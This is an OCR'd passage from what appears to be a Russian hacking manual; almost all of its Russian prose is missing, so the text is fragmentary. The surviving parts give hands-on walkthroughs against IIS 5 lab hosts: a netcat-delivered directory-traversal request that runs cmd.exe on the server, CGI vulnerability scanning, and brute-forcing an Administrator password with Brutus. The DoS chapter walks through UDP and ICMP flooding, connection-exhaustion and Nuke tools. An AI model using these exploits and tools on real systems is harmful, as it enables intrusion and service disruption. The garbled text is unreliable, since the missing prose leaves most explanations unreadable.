> ICQ, Advanced ICQ Password Recovery (


ICQ) .dat, ICQ.
, ,
ICQ 2002 2002. 2002 , UIN .dat, .., ,
207685174.dat (207685174 - UIN ). ICQ Password successfully found! ( ICQ ), (. 11.11).
. 11.11 ,
ICQ 99 - 2000,
ICQ 2002 ( ).

ICQ Password successfully found I


ICQ version:
99b-2000b
UIN password:

Copy to Clipboard

Close

, . .. !
ICQ
, - , - ICQ-. (. 6), , (. 9), Web- (. 8).
, ,
, .


, ICQ
( ) , . , ,
,
ICQ. , ,
ICQ - ,
- . , .
ICQ,
.
. , , ICQ- - ICQ . ,

178

ICQ , UIN . -

?
, , , - ,
. , , - , , , ,
, , - . ICQ - , , ,
,
, , , , .
- , ..
ICQ, , , . , ICQ
ICQ, ICQ ( , ICQ Team
(http://www.lcqteam.com)). ICQ- ICQ, ICQ- - ICQ.

- , .
, ? ,
, . ,
- , ? , ... ,
, , .
ICQ-, -

,
.

ICQ ,
. ICQ -
, -

11. ICQ

179

ICQ-. ICQ
DoS ...
.
ICQ
. -, ,
ICQ-, ICQ-, ICQ- .
ICQ,

ICQ. IP- , ,
ICQ. ICQ .
, ICQ-, UIN
. , ICQ-, -, , BlacklCE Defender,
DoS. -
, , .
,
. ,
ICQ -

.
-, -
ICQ, ICQ. , IP- ICQ-,
- . ,
.
, . ICQ , PGP Desktop Security 2.9,
ICQ-
. ,

PGP- ( [7]).

4.
XakiiH2 W/eb
Web , Web
. ,
- , , .
Web , , , , .
, , , , , Web , ,
Web - ,
. Web - , . , Web

, .
Web,
, . 12 , ,
Web,
Web-. Web
, . ,
, DoS -
, Web- - - .
13 DoS
.

12.

XakuH2 W/eb-caumoB
Web? , Web
,
. Web-
, Web- .
, , , .
, Web-
, ,
, , .
HTML Web-
( - ),
, . HTML
.

(
).
, Web-, , Web-,
, . HTTP, , , .
Web-,
, .
, Web-, DoS
,
, Yahoo.
,
Web-, , ( ) Web- ,
. Web , .

Web-
Web
Web , , Web, Web,

182


, .

Web - Web, Web . Web - , Web, Web . Web


, .
Web - Web,
, Internet Explorer (), -
HTML Web-, HTTP,
Web ( ).
Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation
. Web,
ASP (Active Server Page - ) CGI,
, Java SUN,
Apache Software Foundation . ( CGI, CGI- Web-.)
Web, Web,
, . SQL Microsoft, Oracle Oracle .
, , , -
ODBC (Open Data Base Connectivity -
).
- , , , , , ... ?

xakimza Web-
,
Web-,
. ,
.

12. Web-

183

Web- - ,
, , , , Web .
Web- - Web- ,
, TCP- 80, , Web-,
( CVE, Web-), Web- - .
Web - - ASP, Java, CGI -
, .
Web - , -,
, -, ( !).
, , - . , , (cookie),
, .
- Web-
, , . , , CGI- , -
CGI- , , , .
- ,
Web- ; .
- , Web-
,
, -
.
- , , ,
Web-, Web-, .
, (, . [11]).
, , , , IIS 5. ,
(

184

HTTP), CGI- (
) Web ( Web).

Web- , .
IIS , Web-,
. , Web- ,
- , .
- , Web-. - . , FTP- , , .
, .
Web- .

Web-
,
Web-,
. , , ,
, . , , .
, Web- , IP- , , DNS-,
.
Web.
,
.


Web-
.
.

12. Web-

185

-, ,
-- ,
. IP-, , ,
.
.
-, HTML- Web- . HTML , Web, , .
, , , , JavaScript . , HTML- Web
Web- Teleport Pro.
, , Whols - , ,
Web.
whois (
Unix), Web- , whois Web-.


. , ,
. 1999
- Network Solution (http://www.networksolution.com),
, , InterNic (http://www.internic.net). / .
Web-,
Whois ( ),
. Whois
, ,
, DNS
. ,
RIPE NCC (Network Coordinate Center - ),
-
. Web- RIPE NCC (http://www.ripe.net),
. 12.1.

186

? - IP-
DNS - .

Query the Ripe Whois Database

. 12.1. Web- RIPE NCC


IP- Web-


,
SuperScan (http://www.foundstone.com),
. 12.2.
[1.0.0.1
Resolved

] I Me I |lntei(a<

5lart|1.0.0.1

Slop|l. 0.0.5

Timeout

Pina
IJLILI |
Connect
[2000

0 Ignore IP
0 Ignore IP 255
E>*acl from He

Read
14000 I

Scan type
Resolve hostnames
E3 Only scan responsive pings
0 Show host lesponses
G Ping only
G Evefy port in list
G AH selected ports in list
lisl ports from [T|
AH ports from

peed
Max

'

21 File Transfer Protocol [Control]


25 Simple Mail Transfer
WINS Host Name Saver
53 Domain Name Server
60 WotldWideWebHTTP
HTTP/1.1 401 Access Denied .Server Mictosoll-IIS/5 U.Date: Thu.
68 Kerberos
106 3CDM-TSMUX

Puc. 12.2.

\
12. Web-

187

SuperScan, .
> Start () IP- .
> Stop () .
> Scan type ( )
All list ports from ( ).
> Start ().
SuperScan . , IP- 1.0.0.1 HTTP IIS 5.0, - Web. (
),
.

Legion
(http://packetstormsecurity.org/groups/rhino9),
IP- 1.0.0.1 . 12.3.

Jean

1 Scan Range

AbMtSeM

Scan List

lea

| Add | j |

Impel list

6 share s found on 1 remote hosts.

RTPP EH

V\1 .0.0.1 Wy Documents


\\1.uai\NETLOGDN

B-j | 1.0.0.1
My Documents
-- NETLOGON

w .0.0.140

\\1.0.0.1\T<*I
\4.au1\My Downloads
\\1.0.0.14SYSVOL

D
-~ Test

isa My Downloads
CT SYSVOL

'

'

Map Drive |

Save Text

. 12.3. IIS 5
, IP- IIS 5,
- , ? .

IIS 5
IIS ,
HTTP (Hypertext Transfer Protocol - -

188

) CGI (Common Gateway Interface - ), IIS, .


HTTP , - Web . HTTP , GET. Web- (, ), GET, , ,
http://www.anyserver.com/documents/order.html.
order.html /documents IIS,
c:\inetpub\wwwroot\documents.
CGI , . HTTP, :
http://www.anysite.com/scripts/MyScript7napaMeTp1 +2
MyScript - , /scripts IIS,
?+2 , MyScript. IIS ,
,
,
.
CGI, ASP
(Active Server Pages - ) ISAPI (Internet Server
Programming Interface - ). ASP :
http://www.anysite.com/scripts/MyScripts7napaMeTp1 =1&2=
2
MyScript.asp, , , HTML. ISAPI
, ISAPI. HTTP:
http://www.anysfte.com^sapi.dll?nepeM*HHm1&riepeMeHHafl2
, IIS, , .

HTTP
HTTP ,
IIS . IIS 2.0 :

12. Web-

189

http://www.anysite.com/../../../../../winnt/secret.file
Web- , secret.txt.
- Windows, ACL.
IIS , Web-
[3]. IIS
, , , , ,
SecurityLab.ru (http://www.securitylab.ru).
IIS,
netcat (http://www.atstake.com), 9
(netcat - -
[3] netcat IIS).
netcat Sword-2000
, . netcat .
>

Alex- netcat,
nc -vv 1.0.0.1 80

>
GET / HTTP/ 1.0 iP^l. . 12.4.
Command Prompt

C:4test\netcat>ne -uu 1.0.0.1 80


DNS fud/rew mismatch: SUORD-2QQO != suopd-2000.suord.net
SWORD-2000 [1...1] 80 <http> open
GET / HTTP /1.0
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Fri, 28 Feb 2003 12:55:40 GMT
Content-Type: text/html
Content-Length: 87
<htnl><head><title>Error</titleX/head><bodj(>The parameter
</htnl>sent 17. rcud 224: NOTSOCK
C:4test\netcat>

Puc. 12.4. GET IIS netcat


GET / HTTP/1.0
IIS. . 12.4, HTML, .
, GET <.
GET.txt :

190

GET/HTTP:/1.0
[CRLF]
[CRLF]
[CRLF] . netcat .
nc -vv 1.0.0.1 80 < get.txt

get.txt, . 12.4.
( .)
, . ddcode.txt .
GET /scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP /1.0
[CRLF]
[CRLF]
1-1 Windows
2000 ( ).
netcat :
nc -vv 1.0.0.7 80 < ddcode.txt
. 12.5.
Command Prompt
|: N t e s t N n e t c a O n c -vv 1 . 8 . . 7 88 < adco<
(DNS f ud/>eu ni snatch: ALEX-1 *= ft LEX-1 ,s..
I ALEX-1 [ l . e . 8 . 7 1 88 C h t t p ) open
[HTTP/LI 288 OK
Sepvex: M i c r o s o f t-I IS/5 .
.Date: Sat, 81 2883 67:16:42 GUT
Icontent-Type: a p p l i c a t i o n / o c t e t - s t r e a

186
122
113
186
16
17
128
186

12.2882
12.2882
81.2883
81.2803
81.2883
82.2883
81.2883
82.2883

i t s and Setti
Inetpub
.
netcat
Ppogra
MINNT

. 12.5. 1-1 !
, 1-1
! Sword-2000 ( Windows 2000 Advanced
Server Service Pack 2) - Microsoft , 2000
. ,
URL ,

12. Web-

191

(. [3], [4], [11]).


, . Windows 2000 ?
- ,
? ,
.


Web-, IIS, -
, Web-.
, Web- CGI (Common Gateway Interface - ), , Web .
CGI, , .
Web-,
.., IIS, System, . .
, CGI- ;
, . , -
, ,
, . ,
-
.
, , Perl, , ., , , ,
, , , . , - , , Web, - . , , CGI-, , Web-,

.

192

CGI-
D@MNED CGI Scanner 2.1 (http://shieldandsword.narod.ru/soft/scansec/scansec.htm). . 12.6 ,
.
* D@MNED CGI Scanner 2.1 (177 exploits)
S

Scanner lo^jl Scan list|| CGI holes]! PV ||0ptins|| About... |

t>

READY

. 12.6. CGI- D@MNED CGI Scanner2.1


, D@MNED CGI Scanner 2.1.
Scanners log ( )
. , , , .
Scan list ( ), . 12.7, , .
,
, .
. , ,
.
, .
Scan subnet ( ) IP-, . , : 234.56.78.1 - 8.

12. Web-

193

I Scanner log j[,gc;'ari:ljst || CGI holes|[ Spy |[ Options || About

a 9 If""'

"Jo

_)Vt/users,pwd
rout
'
jdsa*nplBS/c0nfig/site,csc
I/Ad vWorks/equiprnemt/catalog_ty[>B. asp
/ASP3amp/AdvWorks/aquipmen!/cata!og_type.asp .

. 12.8.
CGI-

Puc. 12.7.

CGI holes ( CGI) (. 12.8) CGI-,


.
, ,
,
Scan list ( ).
Spy () (. 12.9),
Web- ( - IIS 5.0),
( ).
$ D@MNED CGI Scanner 2.1 (177 exploits)
Scanner log || Scan list [I CGI holes || Spy

j| Options || About..

Server: Microsoft-HS/S.O
/.1 200 OK
Server; Miqrosoft-IIS/'SiO
Date: Thu, Q6 Feb 2003 10:44:12 GMT
Connection: Keep-Alive

Content-length: (1296

Content-Type: text/html
et-Cookie: ASPSESSIOrJIDGQGGQTFU=HCFBCMBBGPKEJBUCFOEDBCA! path=/
Cache-control: private
READY

Puc. 12.9. CCI- !


Option (), . 12.10,
-, . - -
- -,
- ( , ...).
7-1687

194

D@MNED CGI Scanner 2.1 (177 exploits)


Scanner log]| Scan iist|[CGl holes|| Spy ][ option's|| About... |

Use proxy

gi-bin/

i
iguage

Dofiniee

English

Puc. 12.10. CGI-


D@MNED CGI Scanner 2.1 .
1-1
IP- 1.0.0.7, .
> Scan list ( )
http://www.altavista.com IP- 1.0.0.7.
> Scanner log ( ) . ,
. 12.11.
'if D@MNED CGI Scanner 2.1 (177 exploits)
Scanner Jog||Scan list || CGI holes11 Spy || Options]) About...

\> D
rf.htr-500
1.0.0.7/_vti_pvt/shtml.ex9 - 4G3
1.0,Q.7/_vti_pvt/users,pwd - 4D3
1.0.Q.7/i!Sadmpwd/anot3^htr -500
1.0.0,7/nshelp/iis/mtsc/iirturnh.htw - [ 200 SUCCESS ]
1.0.Q.7/iissarripl9s/ax3ir/s8arch/qfulihit.htw - [ 200 SUCCESS ]
1..Q,Q,7/iis5amp!as/axair/S8arch/qsumrhit.htw - [ 200 SUCCESS ]
1.0,0,7/iissampies/exair/SearclVquery.idq - [ 200 SUCCESS J
1.0,D,7/BSsampies/exair/Search/saarch.idq - t 200 SUCCESS ]
l.D.O.y/iissamples/issamples/fastq.idq - [ 200 SUCCESS 1
l,0.0.7/iisSarnples/is$ampl9Voop/qfullhit.htw - [ JOQ SUCCESS']
1.0,0.7/iis5arnp!es/issamplBS/ODp/qsumrhit.htw - [ 200 SUCCESS
1.0.0.7/iissamples/issamples/querv.idq - [ 200 SUCCESS ]
I.0,0.7/iis5amples/sdk/asp/docs/co<iebrws.asp - t 200 SUCCE
1.0.0.7/msadc/msadcs.dll - [ 200 SUCCESS )
1.0.0.7/scriptsAisadmin/bdir.htr7dir=ht??c:\ - SOQ
1.0.0.7/scripts/iisadmin/ism.dll7http/dir - 500
READY

Puc. 12.11. IIS 5.0


( . 12.11 200 500) ; . , 200 - ,
500 - . 200 (
- SUCCESS)
.

12. Web-

195

, D@MNED CGI Scanner 2.1



. , ,
. ,
1, , MITRE CVE
(http://www.mitre.org). , . 12.11, IIS .htr .idq.; MITRE.
CVE-2001-0500
Buffer overflow in IS API extension (idq.dll) in Index Server 2.0 and Indexing Service 2000 in IIS 6.0 beta and earlier allows remote attackers to execute arbitrary
commands via a long argument to Internet Data Administration (.Ida) and
Internet Data Query (.idq) files such as default.ida, as commonly exploited by
Code Red.
( ISAPI (idq.dll) Index Server 2.0 Indexing Service 2000 IIS 6.0 -
.Ida (Internet Data Administration -
) .idq (Internet Data Query - ),
, default.ida, Code Red.)
Reference: BUGTRAQ:20010618 All versions of Microsoft Internet Information
Services, Remote buffer overflow (SYSTEM Level Access)
Reference: MS:MS01-033
Reference: CERT:CA-2001-13
Reference: BID:2880
Reference: XF:iis-isapi-idq-bo(6705)
Reference: CIAC:L-098
, CGI- IIS
- IIS. , ,
http://www.securityiab.ru. ,
, .
" IIS .htr
, Web . "" , .htr (ISM.DLL).
IIS 4.0 5.0 SP2 1 2002.
IIS - , ,

196

. ISAPI , .htr , ISM.DLL.


ISM.DLL . IWAM_COMPUTERNAME.
. HS 4.0-5.1."
, SecurityLab.ru Unix Pylon, . ,
, ( ,
).
CGI Vulnerability Scan (http://www.wangproducts.co.uk),
. 12.13.

aglimpse
AnyForm2
args.bat
args.cmd
AT-admin
Auth
bnbform.cgi
bsguest.cgi
bslist.cgi
calender.pl
campas
carbo.dll
CGI Counter
CGImail.exe
cgiwrap
classifieds.cgi
Deselect All

Scan All

Scan Selected Stop Scanning Proxy Setup

-ActMty Log-

5
a Save Results

f Clear Log

die...

Puc. 12.12. CGI Vulnerability Scan



CGI-, ,
- .

,
,
SecurityLab.ru
(http://www.securitylab.ru), IIS ( ),
IIS.
, , HTTP - . -

12. Web-

197

Web-? - HTML- Web-, . HTML,


Web, HTML .
Web . , , Teleport Pro (http://www.tenmax.com),
Web .
Teleport Pro.

lA/eb-crtaugep Teleport Pro


Teleport Pro Web-, Web- . Teleport Pro , ( ), , Web Web-.
, ,
- spider - .
Web-
Web - . , , , . Teleport Pro .
Web-
.
Web-, ' .
Web- .
Web-.
Web-, Web-.
Web- .
Web-.
Teleport Pro , Web ,
.

198

Teleport Pro , , Web.


, , Web.
Start () - , Teleport Pro ,
Web, Web-, , .

Web
. , Teleport Pro Web
, .
Web- , Web, .
Teleport Pro . 12.13.
Unwind - Teleport Pro
File

Project

View

Help

Puc. 12.13, Teleport Pro


Windows
Teleport Pro
,
.

npoekma
.
> Teleport Pro File New Project Wizard
( * ). (. 12.14).

12. Web-

199

Welcome to the New Project Wizard!


The New Project Wizard makes it easy for you to setup end
run aTeleport Pro project.
What do you wantTeleport Pro to do?
</ Create a browsable copy of a website on my hard drive
Duplicate awebsite, including directory structure
Search a website for files of a certain type
Explore every site linked from a central site
Retrieve one or more files at known addresses
Search a website for keywords

< Back

. 12.14.
Teleport Pro
. 12.14
Teleport Pro.
Create a browsable copy of website on my hard drive - Web- .
Duplicate a website, including directory structure - Web-,
.
Search a website for files of certain type - Web- .
Explore every site linked from a central site - ,
.
Retrieve one or more files at known addresses -
.
Search a website for keyword - Web- .
> -
Web- . ,
Next ().
(. 12.15).
> Web;
, New Address ( )
.

200

Starting Address
Enter an Internet address to serve as the starling location for
this project Examples of valid Internet addresses ere
"www,microsoft.com", "www.netscape.com/products/", and
"www. ibm.com/home/index htm".

How deeply would you likeTeleportto explore?


Up to

[3

~ links from this starting point

(If you want to add more starting addresses to your project


later, use the "New Address" menu command, or press the
"New Address" button on the toolbar.)

. 12.15.
Web
Up to ... links from this starting point ( ...
) Web , ( 3).
Next ()
(. 12.16).
New Project Wizard - Step 3 of 4

Project Configuration
When creating the local website, retrieve:
Just text
Text end graphics
Text, graphics, and sound
Everything

If you need an account and password to access this site, enter


them here:
iunt:

Password:

< Back

Next >

Cancel

Puc. 12.16.
> . 12.16 , Web
. :
Just text ( ) - .
Text and graphics ( ) -
.

12. Web-

201

Text, graphics, and sound (, ) , .


Everything () - .
> , , Account ( ) , Password
() - .
> Next ()
(. 12.17).
New Project Wizard - Step 4 of 4

Congratulations!
You've just created a Teleport Pro project!
When you press Finish, you will be asked to save the project.
Choose e name for it in the Save dialog box
Teleport Pro will save the project then create a folder, named
after your project in which it will store any retreived files.
When you're ready to run the project press the Start ( ) 1
button on the toolbar, or select Start from the Project menu.

Cancel

Puc. 12.17. !
. 12.17 , Start ()
Start () Project ().
> Finish () (. 12.18) .
Save in: | Ql Teleport results

E> e* I

-J yahoo

Iklingonj
Sove as type:

[Teleporl Pro Project (*.tpp)

Puc. 12.18.
Teleport Pro

202

,
. , ,
Teleport Pro 1.29.1959 HTTP FTP.

Hacmpouka cBoucmB npoekma


Project
Properties ( ), . 12.19
Project Project Properties ( * ).
[Summary | Fila Retrieval | Browsing/Mirroring | Exploration | Exclusions | Nsliquelle [ Advanced |

El Always save HTML pages

Replicate the directory structure of remote servers


Use MSIE-compotible filenames (appends .htm to HTML files where necessary)
r-L
Localize links for retrieved files
r- Links forunretrieved
& LJnkto emessa je that explains why the file was not retrieved
Link to the Internet address for the file
Link to a place vvhers the local file will be stored
3 Link using 8. 3fileno mes
Relink oil files in the project folder now

Cancel

Apply

Puc. 12.19.

Project Properties ( ) , . , Browsing/Mirroring (/
), . 12.19.
Browsing/Mirroring (/ )
,
, ,
,
. .
Always save HTML pages ( HTML) Teleport Pro HTML, .. Web-,
, ,

12. Web-

203

Web, . , Web-
, ,
Web- .htm .html.
Replicate the directory structure of remote servers (
) , .
,
, .
Use MSIE-compatible filenames (append .htm to HTML files where
necessary) ( , 8 (
.htm HTML)) IE ,
HTML, .htm .html (, .shtml .pi). ,
, Teleport Pro
HTML, .htm .html,
.
Linkage System ( ) , , ,
. Localize links for all retrieved files
( ) ,
, Web.
:
Link to a message that explains why the file was not retrieved -
, , . , ,
, .
Link to the Internet address for the file - .
,
.
Link to a place where the local file will be stored - ,
, ..
Web .
Web- , .

204

.
Teleport Pro
HTML- , , , ,
Java, . , -
.

Linkage System (
) Link using 8.3 filenames (, 8.3) , DOS . , ,
8.3.
Relink all files in the project now ( )
HTML
, .

koga HTML
, , , Web-. HTML
Web-? , Web- , ,
Web-. , Web, HTML.
?
-, - ,
. , , , - ,
. , - .
-, - , , - , , . ,
, CGI, , , Web-. HTML
CGI-,
.
, .
, . , - .

12. Web-

205

, ,
, , Web , ,
Retina (http://www.eeye.com/html/Products/Retina/). ,
Teleport Pro (http://www.tenmax.com) HTML-
, Web.

k cmpammkaM Web
, Web ? ,
Web, ,
- . HTML, HTTP.
, , .
Web-,
.
- ,
Web- ,
/ Administrator/password
( , , [3] , (!!!)
Web).
, , Brutus Authentication Engine Test 2 ( 2), Brutus AET2 (http://www.hobie.net/brutus), 10, .
, HTTP.
. 12.20 Brutus.
IIS
Sword-2000, .
> Target () IP- , 1.0.0.1.
> ()
, . HTTP (Basic
Authentication) (HTTP ( )) -
HTTP, ( IIS
Windows IIS).

206

X Brutus - AET2 - www.hoobie.nel/biutus (January 2000]


File

Tooli

Target

1st 3

Help

|1. 0.0.1

Type |HTTP(BasicAulh) H | Start

Stop | Clear |

Port [
I

Connections 10 Timeout ^^ 10
'
'

[] Use Proxy | Define |

. .,.,. , . , .
Method

(HEAD

171 Use Username


UserlD

KeepAfive

Single User

(Administrator

Pass Mode | Brute Force | ] | l;.^nge'| | Dr>*iifcal |


| |Brow$e|

PassFite

| | Bows |

Positive Authentication Results


Target
1.0.0.1/

I Type
HTTP (Basic Auth)

| Username
Administrator

I Password
007

1 Tmcui Rwe. AuhS., Ttote (Mck M


991
|[UAdminislrator :
||65 Attempts per second
||ldle

Puc. 12.20. Web-


Authentication Options ( ) , . Administrator,
Use Username ( ),
Single User ( ).
> Pass Mode ( ) Brute
Force ( ), , .. .
> Range (). Brutus - Brute Force Generation (Brutus - ), . 12.21.
Urutus - Brute Force Generation
Digits only

Min Length

|0

iLowercpse Alplio;

Max Length \S

[> |

Uppercase Alphe
Mixed Alpha
Alphanumeric
Full Keyspoce
Custom Range

|etaoinsrhldcumfpgwybvkxjqz12345678901

Puc. 12.21.
Brutus - Brute Force Generation (Brutus -
) - ,
IIS .

12. Web-

207

; Min Length ( ), Max Length ( ) - 3. ,


Digits only ( ).
.
> Start () Brutus - 2 (. 12.20) . Brutus - 2 . 12.22.
Brutus - 2 - www.hoDbie.nel/biutus - (January 2000)
File

Tools

Help

Target |1.0.0.1

Type | HTTP (Basic Authj [ | Start | Stop | Clear]

pConnection Options10

Connections

Poit

10

Timeout

Q Use Proxy | Define |

-HTTP (Basic) OptionsMethod I HEAD

KeepAlive

-Authentication Options
0 Use Username
UserlD

0 Single User

(Administrator

Positive Authentication Results


Password
007

I Type
I Username
HTTP (Basic Auth)
Administrator

Target
1.0.0.1/

Positive authentication all. 0.0.1/ with User : Administrator Password 007 (992 attempts)
Disengaged target 1.0.0.1 elapsed time : 0:00:17 attempts : 992
RM

992

]|UAdministrator P:000

AuthSeq

* Quick Ml

||ldle

]|58 Attempts per second

Puc. 12.22. IIS !


, IIS , . 12.23, ,
.

1.0.0.1
User name:
Password;,

61

Remember my password

OK

||

Cancel

Puc. 12.23.
Web

208

, Brutus , Web. CGI- Web-. () HTTP


(Form) (HTTP ()) GET ,
, ,
, .

Web, , - . Web
, . , , . , Windows NT/95/98,
Web- CGI Vulnerability
Scan D@MNED CGI Scanner 2.1, ,
, Web, ,
.
, Web-, , ,
. Web - ,
Web- .
, Web- - , Retina, , , [7]. Web- -
,
.

13.

Amaku DoS
, TCP/IP, TCP/IP , . , , - ,

DoS (Denial of Service ). DoS -, TCP/IP .
DoS , . DoS ,
, Yahoo, eBay, CNN.com, www.Microsoft.com,
, [3].
, , , , .
DoS ,
,
, , .
, [3], DoS
,
. ., , , , DoS Web-; , DoS
. ,
, - , DoS.
DoS,
, .

210

.
6 , DoS
,
.
DoS , ,
, , - -

IDS
(,
BlacklCE Defender
(http://blackice.iss.net/)), .

amak DoS
DoS ,
.
, , DoS .
- ,
, , ( Web- Yahoo).
. , , 1 ( 1544 /), , , 56 / ( ).
- ,
, , .

.
- ,
.
- , ,
.
- , .
,
.

13. DoS

211

- ,

, .
.
DoS , , .

Amaku
,
. 1, Web- [3],
, .
, , .
, . , - UDP ICMP.
DoS, , ,
/.

.

UDP
, UDP
UDP, . , DoS, UDP Flooder 2.0
Foundstone (http://www.foundstone.com), , - , .
. 13.1 UDP Flooder 2.0.

212
UDP Flooder 2 00
IP/hostname

IP: 1.0.0.1

1.0.0.5

Max duration (sees)


Speed (pkts/sec)

| 250 |

0 Random

'

[[infinite] |

Port |80

t l
Max packets [[Infinite] |

max .
p-j

min

,
~"V
Modem > Cable > Tl > LAN

[20000 | to

[30000 | bytes

Text
From file

Browse 1 1

Pockets sent

903

Seconds elapsed

20.299

|
|

Go
Stop

Puc. 13.1. UDP



UDP Flooder 2.0,
DoS 1-3
IP- 1.0.0.5 .
> UDP Flooder 2.0.
> IP/hostname (IP/ ) IP- NetBIOS - IP- 1.0.0.5.
> Port () , 80, HTTP-.
> Speed () LAN, .
> Data ()
Random ( ), .
> , , 20 000 30 000, .
Go ().
> , , Stop
().
. 13.2 Alex-
, Networking ().

13. DoS

213

i Windows Task Manager


File

Optioni

View

Help

Applications"] Processes | Performance | NetwJ^ing |


Sword

Adapter Name
Sword

I Network Utilization I

Link Speed!
lOMbps

Operatic

JLJ
Processes: 33

||CPU Usage: 2V.

^Commit Charge: 150620K / J7864 j

Puc. 13.2. - 80%


, -
UDP, 50%
. - ,
LAN Ethernet lOBase.

ICMP
( ) ICMP (Internet Control Message Protocol -
) ICQ,
11 ( UDP).
. 13.3 X-Script ICMP Bomber.
vO 3 By Code
Host 1.0.0.5
Packet Size: h 00000

] Number To Send: hooO

Received 34464 bytes from 1.0.0.5 in 60 msecs


Received 34464 bytes from 1.0.0.5 in 60 msecs
Received 34464 bytes from 1.0.0.5 in 60 msecs
Received 34464 bytes from 1.0.0.5 in 60 msecs
Received 34464 bytes from 1.0.0.5 in 60 msecs

Puc. 13.3. X-Script ICMP Bomber ,

214

, Host
() IP- ,
Ping (). , Packet Size ( )
, Number to Send ( ) .
-
. . 13.4 ,
Alex- ( IP-
, , 1.0.0.5).

File

Options

View

Help

Applications [ Processes | Performance | Networking j


Sword -

Adapter Name
Sword

Processes: 33

I Network Utilization I

CPU Usage: 52

Link Speed |
10 Mbps

Operatic

||Commil Charge: 141720K / 47864 ^

Puc. 13.4. DoS !


ICMP' , ICMP (Internet Control Message Protocol - ) TCP/IP, ICMP
. ICMP
,
Web-; ICMP .

Amaka Smurf
, , ,
DoS ? Smurf, .

13. DoS

215

, , Smurf
. ECHO () ICMP,
. IP- ,
. , , -
10 , .
, DoS, DDoS (Distributed DoS). DDoS -, .
, ,
DoS . DDoS WinTrinoo (
http://www.bindview.com), , , DDoS Win32. 2000 DDoS
, Web- (, , , WinTrinoo).
- Foundstone , ,
DoS.

Amaku
DoS, , , , , . , , DoS,

,
. , .
DoS
PortFuck, ( TCP- , ). PortFuck - TCP- , . ,
,

216

, TCP- ,
, , .
. 13.5 PortFuck.
X

:.; PortFuck 1.02 PRIVATE BUILD


Host: localhost
1
Port:

START

HALT

|D Disconn icton Connect

| "~

| Reconne ct on Disconnect

| |_

Help?

L_

PANIC!

l|_

Delay (MS) [loop


[Ready.

Socks: |0

1
1
l|

Puc. 13.5. PortFuck


PortFuck DoS, .
> Host () IP- (
1.0.0.5).
> Port () 80 - HTTP.
> Disconnect on Connect ( )
Reconnect on Disconnect ( ),
/ Alex- ( -
1.0.0.5).
> PANIC! () , , ..
.
> START () .
> , , HALT
().
. 13.6 PortFuck
Alex-, Windows XP Pentium- 400 .
, - 80-90% ,
, Windows Alex-
. ,
. 13.7 PortFuck
80 Alex-, Attacker 3.0
Foundstone (http://www.foundstone.com).

217

13. DoS
Windows Task Manager
File Option: View

Help

Applications] Processes | Performance [Networking]


'CPU Usage -

CPU Usage History-

-PF Usage

Page File Usage History

Totals
Handles
Threads
Processes

7319
412
37

Commit Charge (K)Total


Limit
Peak

Processes: 37

155448
478648
156872

||CPU Usage: 84%

^Physical Memory (K)


Total
Available
System Cache
Kernel Memory (K)
Total
Paged
[ Nonpaged

196088
45864
73764

24388
20468
3920

||Commil Charge: 15448 / 47861

Pttc. 13.6. Alex-3 !


? Attacker 3.0: Listening on inteiface 1.0.0.5

Slop

jjoitsr

Cop

Program started: Feb 13 2003 10:28:13


Feb132003 10:28:13
TCP connect from 1.0.0.1
Feb132003 10:28:26
TCP connect from 1.0.0.1
Feb132003 10:28:26
TCP connect from 1.0.0.1
Feb132003 10:28:26
TCP connect from 1.0.0.1
Feb132003 10:28:26
TCP connect from 1.0.0.1
Feb132003 10:28:26
TCP connect from 1.0.0.1
Feb 13 2003 10:28:26
TCP connect from 1.0.0.1
Feb132003 10:28:26
TCP conned from 1.0.0.1
Febl 32003 1028:26
TCP connect from 1.0.0.1

poit 1573 to port 80


pof 11574 to port 80
port 157510 port 80
port 1576 to port 80
port 1577 to port 80
port 1560 to port 80
port 1717lo port 80
prat 1734 to port 80
port 1718 to port 80

CJeai

About

Puc. 13.7. Alex-3 - 80


, HTTP-, 1-3,
, . ...

218

Amaku HekoppekmHbiMU nakema/wu


, .. ,
, ..
. , .
, -
. .

Amaku Nuke
^ Nuke ,
DoS, , , -, .
- , . TCP/IP
ICMP, ICMP .
- -
, .. - ICMP, , ,
. ,
.
- - ,
, , ,
. LRC
Web-, , . Nuke -
IRC.
DoS Nuke , ,
Windows 2000/XP ,
Windows 9x.
Windows 2000/XP,
(, [4]). ,
Windows ,
, .
,

.
Nuke - , . ,
Windows Nuke'eM version 1.1, . 13.8.

13. DoS

219

'Windows Nuke'eM - Version 1.1


File

Help

Address

h.00.7

1-0.0.4
1.0.0.5
1.0.0.7

lext Testing 1 2 3
Delay

f-^J Close after execution

This program is created by Sadikuz (c) lor


test-purposes only. The author ot this
program
is not responsible for any misbehaviour by

Execute
Done

Pitc. 13.8.
Nuke , - 1-2, IP- 1.0.0.4
Windows 95. .
> Address () Windows Nuke'eM version 1.1,
. 13.8, IP- Alex-2 (Windows 95), Alex-3 (Windows XP) Alex-1 (Windows 2000).
IP- Add () .
> Execute (). Windows Nuke'eM version 1.1
(. 13.9).
Windows Nuke'eM - Version 1.1
File

Help

Address

Eort

h.0.0.7

1.00.1 {Nuked}
1.0.0.S {Connect error}
1.0.0.7 {Connect error}

lext [Testing 1 2 3
Qelay

LlJ D Close after execution

This program is created by Sadikuz (c) for


test-purposes only. The author of this
program
is not responsible for any misbehaviour by

Execute
Unable to connect to: 1.0.0.7

Puc. 13.9. Alex-2 !


> 1-2, 1-2 Windows.
Windows , . 13.10.

220
File

Edit View Favorites

Tools

Help

*Bacfc -- 53 | !tSearch |giFolderll Q>History 4t X tf>


My Documents
Folders
i Q Web-prog<
tf^ \\Alex-2 is not accessible.
SI @l My Computer
My Network F
The network path was not found.
Entire Neti
icroso

OK

All

f-S Alex-2
-S Alex-3
Sword-2000

ft-<ai
1
0 object(s)

]|41,7

|| My Computer

Puc. 13.10. , Alex-2 !


, 1-2 - Nuke. ,
- IP-.
Windows , , , IDS ( BlacklCE Defender).

Amaku Teardrop
, ,
Teardrop, Windows, Windows
NT 4 . Teardrop . , , ,
.
,
-
, . , , ( ), .
Windows /NT,
Windows 2000/XP.

Amaka Ping of Death


Ping of Death ( ) -
ICMP ( 1 -

13. DoS

221

),
ICMP, .. 64 .
, , ,
Windows , OS UNIX.

Amaku Land
Land , TCP- , - (, - ). TCP-
, , , , ..
TCP- . ,
IP- ,
. ,
, ,
TCP-.
, Land (, - Land), - Land
- Windows, Unix, MAC OS,
CISCO, 3COM.
Land, .

Amaku nakemaMu
